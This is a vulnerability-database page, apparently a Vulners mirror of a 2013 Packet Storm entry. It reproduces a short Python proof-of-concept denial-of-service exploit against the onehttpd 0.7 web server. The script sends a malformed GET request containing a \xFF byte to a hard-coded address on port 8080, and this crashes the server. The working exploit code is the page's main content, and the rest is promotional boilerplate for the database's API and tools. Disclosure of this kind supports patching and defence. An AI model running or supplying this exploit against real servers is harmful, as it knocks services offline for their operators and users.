Lucene search
K

onehttpd 0.7 Denial Of Service

🗓️ 13 Aug 2013 00:00:00Reported by superkojimanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

onehttpd 0.7 Denial of Service exploit on Window

Code
`#!/usr/bin/env python  
# Exploit Title: onehttpd 0.7 Denial of Service  
# Date: 12 Aug 2013  
# Exploit Author: superkojiman - http://www.techorganic.com  
# Vendor Homepage: https://code.google.com/p/onehttpd/  
# Version: onehttpd 0.7  
# Tested on: Windows 7 Ultimate English  
# Windows XP SP2 English  
#  
from socket import *  
  
buf = (  
"GET /\xFF HTTP/1.1\r\n" +  
"Host: 192.168.1.143\r\n" +  
"\r\n"  
)  
  
s = socket(AF_INET, SOCK_STREAM)  
s.connect(("192.168.1.143", 8080))  
s.send(buf)  
s.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Aug 2013 00:00Current
7.4High risk
Vulners AI Score7.4
22